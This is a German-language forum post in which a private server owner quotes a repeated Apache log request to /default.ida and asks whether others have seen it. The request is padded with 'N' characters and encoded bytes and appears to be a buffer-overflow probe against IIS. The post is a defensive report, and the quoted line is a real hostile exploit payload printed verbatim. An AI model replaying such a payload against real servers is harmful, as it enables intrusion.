Hallo Leute,

ich habe einen kleinen privaten Webserver mit wechselnden IPs laufen. Heute tauchen im Log des Apaches mehrfach folgende Anforderungen auf:

"GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0"

Die werden zwar mit Fehlercode 400 beantwortet ("Client sent malformed Host header"), aber ein bißchen zu denken geben mir die Requests noch. Sie kommen sporadisch, so alle 10 bis 15 Minuten, und jedesmal von anderen IP-Adressen.

Für mich sieht es ganz nach einem Angriff der Sorte "Buffer Overflow" aus. Kennt jemand ähnliches?

Bin für jeden Tip dankbar!

Gruß
Thorsten